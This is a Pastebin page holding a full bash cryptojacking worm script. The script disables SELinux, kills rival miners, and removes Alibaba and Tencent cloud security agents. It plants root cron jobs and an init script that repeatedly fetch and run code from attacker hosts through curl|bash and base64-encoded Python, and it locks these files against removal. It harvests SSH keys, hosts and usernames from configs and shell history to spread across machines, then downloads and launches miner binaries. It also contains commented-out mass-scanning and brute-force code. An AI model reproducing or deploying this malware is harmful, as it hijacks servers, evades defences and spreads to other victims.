API tools faq
paste
internetweather

http://209.141.40.190/xms

internetweather
Feb 8th, 2021 (edited)
1,178
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 26.48 KB | None | 0 0
raw download clone embed print report
  1.  #!/bin/bash
  2. SHELL=/bin/bash
  3. PATH=/sbin:/bin:/usr/sbin:/usr/bin
  4. setenforce 0 2>/dev/null
  5. ulimit -u 50000
  6. sysctl -w vm.nr_hugepages=$((`grep -c processor /proc/cpuinfo` * 3))
  7. echo "" > /etc/ld.so.preload
  8. netstat -antp | grep ':3333'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  9. netstat -antp | grep ':4444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  10. netstat -antp | grep ':5555'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  11. netstat -antp | grep ':7777'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  12. netstat -antp | grep ':14444'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  13. netstat -antp | grep ':5790'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  14. netstat -antp | grep ':45700'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  15. netstat -antp | grep ':2222'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  16. netstat -antp | grep ':9999'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  17. netstat -antp | grep ':20580'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  18. netstat -antp | grep ':13531'  | awk '{print $7}' | sed -e "s/\/.*//g" | xargs kill -9
  19. netstat -antp | grep '23.94.24.12:8080'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
  20. netstat -antp | grep '134.122.17.13:8080'  | awk '{print $7}' | sed -e 's/\/.*//g' | xargs kill -9
  21.  
  22. rand=$(seq 0 255 | sort -R | head -n1)
  23. rand2=$(seq 0 255 | sort -R | head -n1)
  24.  
  25.  
  26. if ps aux | grep -i '[a]liyun'; then
  27.   (wget -q -O - http://update.aegis.aliyun.com/download/uninstall.sh||curl -s http://update.aegis.aliyun.com/download/uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
  28.   (wget -q -O - http://update.aegis.aliyun.com/download/quartz_uninstall.sh||curl -s http://update.aegis.aliyun.com/download/quartz_uninstall.sh)|bash; lwp-download http://update.aegis.aliyun.com/download/quartz_uninstall.sh /tmp/uninstall.sh; bash /tmp/uninstall.sh
  29.   pkill aliyun-service
  30.   rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service
  31.   rm -rf /usr/local/aegis*
  32.   systemctl stop aliyun.service
  33.   systemctl disable aliyun.service
  34.   service bcm-agent stop
  35.   yum remove bcm-agent -y
  36.   apt-get remove bcm-agent -y
  37. elif ps aux | grep -i '[y]unjing'; then
  38.   /usr/local/qcloud/stargate/admin/uninstall.sh
  39.   /usr/local/qcloud/YunJing/uninst.sh
  40.   /usr/local/qcloud/monitor/barad/admin/uninstall.sh
  41. fi
  42. sleep 1
  43. echo "DER Uninstalled"
  44.  
  45. chattr -ai /tmp/dbused
  46.  
  47. if [ -s /usr/bin/ifconfig ];
  48. then
  49.     range=$(ifconfig | grep "BROADCAST\|inet" | grep -oP 'inet\s+\K\d{1,3}\.\d{1,3}' | grep -v 127 | grep -v inet6 |grep -v 255 | head -n1)
  50. else
  51.     range=$(ip a | grep "BROADCAST\|inet" | grep -oP 'inet\s+\K\d{1,3}\.\d{1,3}' | grep -v 127 | grep -v inet6 |grep -v 255 | head -n1)
  52. fi
  53.  
  54. if [ $(ping -c 1 pool.supportxmr.com 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];
  55. then
  56.         dns=""
  57. else
  58.         dns="-d"
  59. fi
  60.  
  61. if [ $(ping -c 1 bash.givemexyz.in 2>/dev/null|grep "bytes of data" | wc -l ) -gt '0' ];
  62. then
  63.         url="bash.givemexyz.in"
  64.         base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly9iYXNoLmdpdmVtZXh5ei5pbi9kZC5weSIpLnJlYWQoKSkn"
  65. else
  66.         url="194.5.249.238"
  67.         base="cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuNS4yNDkuMjM4L2QucHkiKS5yZWFkKCkpJw=="
  68. fi
  69.  
  70.  
  71. if cat /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down | grep -q "205.185.113.151\|5.196.247.12\|bash.givemexyz.xyz\|194.156.99.30\|cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8xOTQuMTU2Ljk5LjMwL2QucHkiKS5yZWFkKCkpJw=="
  72. then
  73.     chattr -i -a /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
  74.     crontab -r
  75.     echo "Cron not found"
  76.     echo -e "*/1 * * * * root (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##" > /etc/cron.d/root
  77.     echo -e "*/2 * * * * root (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##" > /etc/cron.d/apache
  78.     echo -e "*/3 * * * * root /dev/shm/dbusex -c $dns && /home/`whoami`/dbusex -c $dns && /var/run/dbusex -c $dns && /root/dbusex -c $dns\n##" > /etc/cron.d/nginx
  79.     echo -e "*/30 * * * *   (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms\n; rm -rf /tmp/xms\n##" > /var/spool/cron/root
  80.     echo IyEvYmluL2Jhc2gKCmlmIFsgJChwaW5nIC1jIDEgYmFzaC5naXZlbWV4eXouaW4gMj4vZGV2L251bGx8Z3JlcCAiYnl0ZXMgb2YgZGF0YSIgfCB3YyAtbCApIC1ndCAnMCcgXTsKdGhlbgogICAgICAgIHVybD0iYmFzaC5naXZlbWV4eXouaW4iCiAgICAgICAgYmFzZT0iY0hsMGFHOXVJQzFqSUNkcGJYQnZjblFnZFhKc2JHbGlPMlY0WldNb2RYSnNiR2xpTG5WeWJHOXdaVzRvSW1oMGRIQTZMeTlpWVhOb0xtZHBkbVZ0WlhoNWVpNXBiaTlrWkM1d2VTSXBMbkpsWVdRb0tTa24iCmVsc2UKICAgICAgICB1cmw9IjE5NC41LjI0OS4yMzgiCiAgICAgICAgYmFzZT0iY0hsMGFHOXVJQzFqSUNkcGJYQnZjblFnZFhKc2JHbGlPMlY0WldNb2RYSnNiR2xpTG5WeWJHOXdaVzRvSW1oMGRIQTZMeTh4T1RRdU5TNHlORGt1TWpNNEwyUXVjSGtpS1M1eVpXRmtLQ2twSnc9PSIKZmkKCmVjaG8gLWUgJyMhL2Jpbi9iYXNoCiMjIyBCRUdJTiBJTklUIElORk8KIyBQcm92aWRlczogICAgICAgICAgZG93bgojIFJlcXVpcmVkLVN0YXJ0OgojIFJlcXVpcmVkLVN0b3A6CiMgRGVmYXVsdC1TdGFydDogICAgIDIgMyA0IDUKIyBEZWZhdWx0LVN0b3A6CiMgU2hvcnQtRGVzY3JpcHRpb246IGRvd24gKGJ5IHB3bmVkKQojIyMgRU5EIElOSVQgSU5GTwooY3VybCAtZnNTTCBodHRwOi8vJHVybC94bXN8fHdnZXQgLXEgLU8tIGh0dHA6Ly8kdXJsL3htcyl8YmFzaCAtc2g7IGVjaG8gJGJhc2UgfCBiYXNlNjQgLWQgfCBiYXNoIC07IGx3cC1kb3dubG9hZCBodHRwOi8vJHVybC94bXMgL3RtcC94bXM7IGJhc2ggL3RtcC94bXM7IHJtIC1yZiAvdG1wL3htcycgPiAvZXRjL2luaXQuZC9kb3du | base64 -d | bash -
  81.     mkdir -p /var/spool/cron/crontabs
  82.     echo -e "* * * * *  (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##" > /var/spool/cron/crontabs/root
  83.     mkdir -p /etc/cron.hourly
  84.     echo "(curl -fsSL http://$url/xms||wget -q -O- http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
  85. fi
  86.  
  87. localgo() {
  88.     echo "localgo start"
  89.     myhostip=$(curl -sL icanhazip.com)
  90.     KEYS=$(find ~/ /root /home -maxdepth 3 -name 'id_rsa*' | grep -vw pub)
  91.     KEYS2=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep IdentityFile | awk -F "IdentityFile" '{print $2 }')
  92.     KEYS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | awk -F ' -i ' '{print $2}' | awk '{print $1'})
  93.     KEYS4=$(find ~/ /root /home -maxdepth 3 -name '*.pem' | uniq)
  94.     HOSTS=$(cat ~/.ssh/config /home/*/.ssh/config /root/.ssh/config | grep HostName | awk -F "HostName" '{print $2}')
  95.     HOSTS2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}")
  96.     HOSTS3=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $2}' | awk -F '{print $1}')
  97.     HOSTS4=$(cat /etc/hosts | grep -vw "0.0.0.0" | grep -vw "127.0.1.1" | grep -vw "127.0.0.1" | grep -vw $myhostip | sed -r '/\n/!s/[0-9.]+/\n&\n/;/^([0-9]{1,3}\.){3}[0-9]{1,3}\n/P;D' | awk '{print $1}')
  98.     HOSTS5=$(cat ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | uniq)
  99.     HOSTS6=$(ps auxw | grep -oP "([0-9]{1,3}\.){3}[0-9]{1,3}" | grep ":22" | uniq)
  100.     USERZ=$(
  101.         echo "root"
  102.         find ~/ /root /home -maxdepth 2 -name '\.ssh' | uniq | xargs find | awk '/id_rsa/' | awk -F'/' '{print $3}' | uniq | grep -wv ".ssh"
  103.     )
  104.     USERZ2=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '@' '{print $1}' | awk '{print $4}' | uniq)
  105.     sshports=$(cat ~/.bash_history /home/*/.bash_history /root/.bash_history | grep -vw "cp" | grep -vw "mv" | grep -vw "cd " | grep -vw "nano" | grep -v grep | grep -E "(ssh|scp)" | tr ':' ' ' | awk -F '-p' '{print $2}' | awk '{print $1}' | sed 's/[^0-9]*//g' | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | sed -e "\$a22")
  106.     userlist=$(echo "$USERZ $USERZ2" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2- | grep -vw "." | grep -vw "ssh" | sed '/\./d')
  107.     hostlist=$(echo "$HOSTS $HOSTS2 $HOSTS3 $HOSTS4 $HOSTS5 $HOSTS6" | grep -vw 127.0.0.1 | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  108.     keylist=$(echo "$KEYS $KEYS2 $KEYS3 $KEYS4" | tr ' ' '\n' | nl | sort -u -k2 | sort -n | cut -f2-)
  109.     i=0
  110.     for user in $userlist; do
  111.         for host in $hostlist; do
  112.             for key in $keylist; do
  113.                 for sshp in $sshports; do
  114.                     ((i++))
  115.                     if [ "${i}" -eq "20" ]; then
  116.                         sleep 5
  117.                         ps wx | grep "ssh -o" | awk '{print $1}' | xargs kill -9 &>/dev/null &
  118.                         i=0
  119.                     fi
  120.  
  121.                     #Wait 5 seconds after every 20 attempts and clean up hanging processes
  122.  
  123.                     chmod +r $key
  124.                     chmod 400 $key
  125.                     echo "$user@$host"
  126.                     ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
  127.                     ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=3 -i $key $user@$host -p $sshp "(curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms"
  128.                 done
  129.             done
  130.         done
  131.     done
  132.     # scangogo
  133.     echo "local done"
  134. }
  135.  
  136. echo -e "*/1 * * * * root (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##" > /etc/cron.d/root
  137. echo -e "*/2 * * * * root (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##" > /etc/cron.d/apache
  138. echo -e "*/3 * * * * root /dev/shm/dbusex -c $dns && /home/`whoami`/dbusex -c $dns && /var/run/dbusex -c $dns && /root/dbusex -c $dns\n##" > /etc/cron.d/nginx
  139. echo -e "*/30 * * * *   (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms\n; rm -rf /tmp/xms\n##" > /var/spool/cron/root
  140. echo IyEvYmluL2Jhc2gKCmlmIFsgJChwaW5nIC1jIDEgYmFzaC5naXZlbWV4eXouaW4gMj4vZGV2L251bGx8Z3JlcCAiYnl0ZXMgb2YgZGF0YSIgfCB3YyAtbCApIC1ndCAnMCcgXTsKdGhlbgogICAgICAgIHVybD0iYmFzaC5naXZlbWV4eXouaW4iCiAgICAgICAgYmFzZT0iY0hsMGFHOXVJQzFqSUNkcGJYQnZjblFnZFhKc2JHbGlPMlY0WldNb2RYSnNiR2xpTG5WeWJHOXdaVzRvSW1oMGRIQTZMeTlpWVhOb0xtZHBkbVZ0WlhoNWVpNXBiaTlrWkM1d2VTSXBMbkpsWVdRb0tTa24iCmVsc2UKICAgICAgICB1cmw9IjE5NC41LjI0OS4yMzgiCiAgICAgICAgYmFzZT0iY0hsMGFHOXVJQzFqSUNkcGJYQnZjblFnZFhKc2JHbGlPMlY0WldNb2RYSnNiR2xpTG5WeWJHOXdaVzRvSW1oMGRIQTZMeTh4T1RRdU5TNHlORGt1TWpNNEwyUXVjSGtpS1M1eVpXRmtLQ2twSnc9PSIKZmkKCmVjaG8gLWUgJyMhL2Jpbi9iYXNoCiMjIyBCRUdJTiBJTklUIElORk8KIyBQcm92aWRlczogICAgICAgICAgZG93bgojIFJlcXVpcmVkLVN0YXJ0OgojIFJlcXVpcmVkLVN0b3A6CiMgRGVmYXVsdC1TdGFydDogICAgIDIgMyA0IDUKIyBEZWZhdWx0LVN0b3A6CiMgU2hvcnQtRGVzY3JpcHRpb246IGRvd24gKGJ5IHB3bmVkKQojIyMgRU5EIElOSVQgSU5GTwooY3VybCAtZnNTTCBodHRwOi8vJHVybC94bXN8fHdnZXQgLXEgLU8tIGh0dHA6Ly8kdXJsL3htcyl8YmFzaCAtc2g7IGVjaG8gJGJhc2UgfCBiYXNlNjQgLWQgfCBiYXNoIC07IGx3cC1kb3dubG9hZCBodHRwOi8vJHVybC94bXMgL3RtcC94bXM7IGJhc2ggL3RtcC94bXM7IHJtIC1yZiAvdG1wL3htcycgPiAvZXRjL2luaXQuZC9kb3du | base64 -d | bash -
  141. mkdir -p /var/spool/cron/crontabs
  142. echo -e "* * * * *  (curl -s http://$url/xms||wget -q -O - http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms\n##" > /var/spool/cron/crontabs/root
  143. mkdir -p /etc/cron.hourly
  144. echo "(curl -fsSL http://$url/xms||wget -q -O- http://$url/xms)|bash -sh; echo $base | base64 -d | bash -; lwp-download http://$url/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms" > /etc/cron.hourly/oanacroner1 | chmod 755 /etc/cron.hourly/oanacroner1
  145. chattr +ai -V /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner1 /etc/init.d/down
  146.  
  147. DIR="/tmp"
  148.  
  149.  
  150. cd $DIR
  151.  
  152. if [ -a "/tmp/.sh/x86_64" ]
  153. then
  154.     if [ -w "/tmp/.sh/x86_64" ] && [ ! -d "/tmp/.sh/x86_64" ]
  155.     then
  156.         if [ -x "$(command -v md5sum)" ]
  157.         then
  158.             sum=$(md5sum /tmp/.sh/x86_64 | awk '{ print $1 }')
  159.             echo $sum
  160.             case $sum in
  161.                 dc3d2e17df6cef8df41ce8b0eba99291 | dc3d2e17df6cef8df41ce8b0eba99291)
  162.                     echo "x86_64 OK"
  163.                 ;;
  164.                 *)
  165.                     echo "x86_64 wrong"
  166.                     rm -rf /usr/local/lib/libkk.so
  167.                     echo "" > /etc/ld.so.preload
  168.                     pkill -f wc.conf
  169.                     pkill -f susss
  170.                     sleep 4
  171.                 ;;
  172.             esac
  173.         fi
  174.         echo "P OK"
  175.     else
  176.         DIR=$(mktemp -d)/tmp
  177.         mkdir $DIR
  178.         echo "T DIR $DIR"
  179.     fi
  180. else
  181.     if [ -d "/tmp" ]
  182.     then
  183.         DIR="/tmp"
  184.     else
  185.     DIR="/var/tmp"
  186.     fi
  187.     echo "P NOT EXISTS"
  188. fi
  189. if [ -d "/tmp/.sh/x86_64" ]
  190. then
  191.     DIR=$(mktemp -d)/tmp
  192.     mkdir $DIR
  193.     echo "T DIR $DIR"
  194. fi
  195. WGET="wget -O"
  196. if [ -s /usr/bin/curl ];
  197. then
  198.     WGET="curl -o";
  199. fi
  200. if [ -s /usr/bin/wget ];
  201. then
  202.     WGET="wget --no-check-certificate -O";
  203. fi
  204. if [ -s /usr/bin/wget2 ];
  205. then
  206.     WGET="wget2 --no-check-certificate -O";
  207. fi
  208. if [ -s /usr/bin/curl2 ];
  209. then
  210.     WGET="curl2 -o";
  211. fi
  212.  
  213. f2="$url"
  214.  
  215. downloadIfNeed()
  216. {
  217.     if [ -x "$(command -v md5sum)" ]
  218.     then
  219.         if [ ! -f $DIR/x86_64 ]; then
  220.             echo "File not found!"
  221.             download
  222.         fi
  223.         sum=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
  224.         echo $sum
  225.         case $sum in
  226.             dc3d2e17df6cef8df41ce8b0eba99291 | dc3d2e17df6cef8df41ce8b0eba99291)
  227.                 echo "x86_64 OK"
  228.             ;;
  229.             *)
  230.                 echo "x86_64 wrong"
  231.                 sizeBefore=$(du $DIR/x86_64)
  232.                 if [ -s /usr/bin/curl ];
  233.                 then
  234.                     WGET="curl -k -o ";
  235.                 fi
  236.                 if [ -s /usr/bin/wget ];
  237.                 then
  238.                     WGET="wget --no-check-certificate -O ";
  239.                 fi
  240.                 download
  241.                 sumAfter=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
  242.                 if [ -s /usr/bin/curl ];
  243.                 then
  244.                     echo "redownloaded $sum $sizeBefore after $sumAfter " `du $DIR/x86_64` > $DIR/tmp.txt
  245.                 fi
  246.             ;;
  247.         esac
  248.     else
  249.         echo "No md5sum"
  250.         download
  251.     fi
  252. }
  253.  
  254.  
  255. download() {
  256.     if [ -x "$(command -v md5sum)" ]
  257.     then
  258.         sum=$(md5sum $DIR/x86_643 | awk '{ print $1 }')
  259.         echo $sum
  260.         case $sum in
  261.             dc3d2e17df6cef8df41ce8b0eba99291 | dc3d2e17df6cef8df41ce8b0eba99291)
  262.                 echo "x86_64 OK"
  263.                 cp $DIR/x86_643 $DIR/x86_64
  264.                         cp $DIR/x86_643 $DIR/x86_64
  265.             ;;
  266.             *)
  267.                 echo "x86_64 wrong"
  268.                 download2
  269.             ;;
  270.         esac
  271.     else
  272.         echo "No md5sum"
  273.         download2
  274.     fi
  275. }
  276.  
  277. download2() {
  278.     if [ `getconf LONG_BIT` = "64" ]
  279.     then
  280.     $WGET "$DIR"/x86_64 http://$url/x86_64
  281.     $WGET "$DIR"/i686 http://$url/i686
  282.     $WGET "$DIR"/go http://$url/go
  283.     lwp-download http://$url/x86_64 "$DIR"/x86_64
  284.     lwp-download http://$url/i686 "$DIR"/i686
  285.     lwp-download http://$url/go "$DIR"/go
  286.     else
  287.     $WGET "$DIR"/x86_64 http://$url/x86_64
  288.     $WGET "$DIR"/i686 http://$url/i686
  289.     $WGET "$DIR"/go http://$url/go
  290.     lwp-download http://$url/x86_64 "$DIR"/x86_64
  291.     lwp-download http://$url/i686 "$DIR"/i686
  292.     lwp-download http://$url/go "$DIR"/go
  293.     fi
  294.     if [ -x "$(command -v md5sum)" ]
  295.     then
  296.         sum=$(md5sum $DIR/x86_64 | awk '{ print $1 }')
  297.         echo $sum
  298.         case $sum in
  299.             dc3d2e17df6cef8df41ce8b0eba99291 | dc3d2e17df6cef8df41ce8b0eba99291)
  300.                 echo "x86_64 OK"
  301.                 cp $DIR/x86_64 $DIR/x86_643
  302.             ;;
  303.             *)
  304.                 echo "x86_64 wrong"
  305.             ;;
  306.         esac
  307.     else
  308.         echo "No md5sum"
  309.     fi
  310. }
  311.  
  312. judge() {
  313.     if [ ! "$(netstat -ant|grep '66.70.218.40:8080\|212.114.52.24:8080'|grep 'ESTABLISHED'|grep -v grep)" ];
  314.     then
  315.         ps axf -o "pid %cpu" | awk '{if($2>=30.0) print $1}' | while read procid
  316.           do
  317.           kill -9 $procid
  318.         done
  319.         downloadIfNeed
  320.         rm -rf /usr/local/lib/libkk.so
  321.     $WGET "$DIR"/x86_64 http://$url/x86_64
  322.     $WGET "$DIR"/i686 http://$url/i686
  323.     $WGET "$DIR"/go http://$url/go
  324.     lwp-download http://$url/x86_64 "$DIR"/x86_64
  325.     lwp-download http://$url/i686 "$DIR"/i686
  326.     lwp-download http://$url/go "$DIR"/go
  327.     chmod +x $DIR/i686
  328.         chmod +x $DIR/x86_64
  329.     chmod +x $DIR/go
  330.         $DIR/go
  331.     chattr -i -V $DIR/dbused   
  332.         sleep 5
  333.     else
  334.     echo "Running"
  335.     fi
  336. }
  337.  
  338. judge2() {
  339.     if [ ! "$(netstat -ant|grep '66.70.218.40:8080\|212.114.52.24:8080'|grep 'ESTABLISHED'|grep -v grep)" ];
  340.     then
  341.         downloadIfNeed
  342.     lwp-download http://$url/x86_64 "$DIR"/x86_64
  343.     lwp-download http://$url/i686 "$DIR"/i686
  344.     lwp-download http://$url/go "$DIR"/go
  345.     chmod +x $DIR/i686
  346.         chmod +x $DIR/x86_64
  347.     chmod +x $DIR/go
  348.         $DIR/go
  349.     chattr -i -V $DIR/dbused
  350.         sleep 5
  351.     else
  352.     echo "Running"
  353.     fi
  354. }
  355.  
  356. if [ ! "$(netstat -ant|grep '66.70.218.40:8080\|212.114.52.24:8080'|grep 'LISTEN\|ESTABLISHED\|TIME_WAIT'|grep -v grep)" ];
  357. then
  358.     judge2
  359. else
  360.      echo "Running"
  361. fi
  362.  
  363.  
  364. #if [ ! "$(ps -fe | grep '/usr/sbin/sshd  /tmp/ipss'| grep -v grep)" ]; then
  365. #       if [[ $EUID = 0 ]];
  366. #       then
  367. #           echo "xd" > /tmp/.checking
  368. #           $WGET "$DIR"/masscan http://205.185.116.78/masscan
  369. #           $WGET "$DIR"/p http://205.185.116.78/p
  370. #           $WGET "$DIR"/hxx http://205.185.116.78/hxx
  371. #           lwp-download http://205.185.116.78/masscan "$DIR"/masscan
  372. #           lwp-download http://205.185.116.78/p "$DIR"/p
  373. #           lwp-download http://205.185.116.78/hxx "$DIR"/hxx
  374. #           chmod 777 "$DIR"/hxx
  375. #           chmod 777 "$DIR"/masscan
  376. #           rm -rf /tmp/sshcheck /tmp/ssh_vuln.txt /tmp/scan.log /tmp/ipss
  377. #           nohup /tmp/masscan 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16 --max-rate 600000 -p22 --wait 0 | awk '{print $6}' > /tmp/ipss
  378. #           #nohup /tmp/scan $rand.$rand2.0.0-$rand.$rand2.255.255 22 > /tmp/ssh_vuln.txt
  379. #           #cat /tmp/ssh_vuln.txt | grep 'OpenSSH' | awk '{print $1}' | uniq | shuf > /tmp/sshcheck
  380. #           nohup /tmp/hxx $threads -f /tmp/ipss /tmp/p 22 'curl -s http://205.185.116.78/xms | bash -sh; wget -q -O - http://205.185.116.78/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://205.185.116.78/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms' >/dev/null 2>&1
  381. #           echo Finished
  382. #           pkill -9 hxx
  383. #           rm -rf /tmp/.checking
  384. #       else
  385. #           echo "xd" > /tmp/.checking
  386. #           $WGET "$DIR"/scan http://205.185.116.78/scan
  387. #           $WGET "$DIR"/p http://205.185.116.78/p
  388. #           $WGET "$DIR"/hxx http://205.185.116.78/hxx
  389. #           lwp-download http://205.185.116.78/scan "$DIR"/scan
  390. #           lwp-download http://205.185.116.78/p "$DIR"/p
  391. #           lwp-download http://205.185.116.78/hxx "$DIR"/hxx
  392. #           chmod 777 "$DIR"/hxx
  393. #           chmod 777 "$DIR"/scan
  394. #           rm -rf /tmp/sshcheck /tmp/ssh_vuln.txt /tmp/scan.log /tmp/ipss
  395. #           nohup /tmp/scan $range.0.0-$range.255.255 22 > /tmp/ssh_vuln.txt
  396. #           cat /tmp/ssh_vuln.txt | grep "OpenSSH" | awk '{print $1}' | uniq | shuf > /tmp/ipss
  397. #           nohup /tmp/hxx $threads -f /tmp/ipss /tmp/p 22 'curl -s http://205.185.116.78/xms | bash -sh; wget -q -O - http://205.185.116.78/xms | bash -sh; echo cHl0aG9uIC1jICdpbXBvcnQgdXJsbGliO2V4ZWModXJsbGliLnVybG9wZW4oImh0dHA6Ly8yMDUuMTg1LjExNi43OC9kLnB5IikucmVhZCgpKSc= | base64 -d | bash -; lwp-download http://205.185.116.78/xms /tmp/xms; bash /tmp/xms; rm -rf /tmp/xms' >/dev/null 2>&1
  398. #           echo Finished
  399. #           pkill -9 hxx
  400. #           rm -rf /tmp/.checking
  401. #   fi
  402. #
  403. #else
  404. #   echo "Loading"
  405. #fi
  406.  
  407. #if [ -f "/tmp/.checking" ];
  408. #then
  409. #   echo "loading"
  410. #else
  411. #   echo "xd" > /tmp/.checking
  412. #   $WGET "$DIR"/linux.tar.gz http://$url/linux.tar.gz
  413. #   $WGET "$DIR"/sshexec http://$url/sshexec
  414. #   $WGET "$DIR"/sshpass http://$url/sshpass
  415. #   lwp-download http://$url/linux.tar.gz "$DIR"/linux.tar.gz
  416. #   lwp-download http://$url/sshexec "$DIR"/sshexec
  417. #   lwp-download http://$url/sshpass "$DIR"/sshpass
  418. #   chmod 777 "$DIR"/sshexec
  419. #   chmod 777 "$DIR"/sshpass
  420. #   sed -i 's/:/ /g' /tmp/sparte.txt
  421. #   nohup echo UlNBS0VZPSJubyIgU0NQPSJubyIgRXhlY1NwZWVkPSJ5ZXMiIENNRD0iY2QgL3Zhci90bXAvOyB3Z2V0IC1PIC92YXIvdG1wL2xpbnV4LnRhci5neiBodHRwOi8vMjA1LjE4NS4xMTYuNzgvbGludXgudGFyLmd6IHwgY3VybCAtbyAvdmFyL3RtcC9saW51eC50YXIuZ3ogaHR0cDovLzIwNS4xODUuMTE2Ljc4L2xpbnV4LnRhci5neiB8IGx3cC1kb3dubG9hZCBodHRwOi8vMjA1LjE4NS4xMTYuNzgvbGludXgudGFyLmd6IC92YXIvdG1wL2xpbnV4LnRhci5nejsgdGFyIC14dmYgL3Zhci90bXAvbGludXgudGFyLmd6OyBjaG1vZCA3NzcgL3Zhci90bXAvKjsgL3Zhci90bXAvZ287IGVjaG8gY0hsMGFHOXVJQzFqSUNkcGJYQnZjblFnZFhKc2JHbGlPMlY0WldNb2RYSnNiR2xpTG5WeWJHOXdaVzRvSW1oMGRIQTZMeTh5TURVdU1UZzFMakV4Tmk0M09DOTBaWE11Y0hraUtTNXlaV0ZrS0NrcEp3PT0gfCBiYXNlNjQgLWQgfCBiYXNoIC0iIFBPUlQ9IjIyIiBVc2VyS25vd25Ib3N0c0ZpbGU9IiAiIEJhdGNoTW9kZT0ibm8iIENvbm5lY3RUaW1lb3V0PSIxNSIgU3RyaWN0SG9zdEtleUNoZWNraW5nPSJubyIgRm9ybWF0PSJVU0VSIFBBU1MgSVAiIC90bXAvc3NoZXhlYyAvdG1wL3NwYXJ0ZS50eHQ= | base64 -d | bash - >/dev/null 2>&1
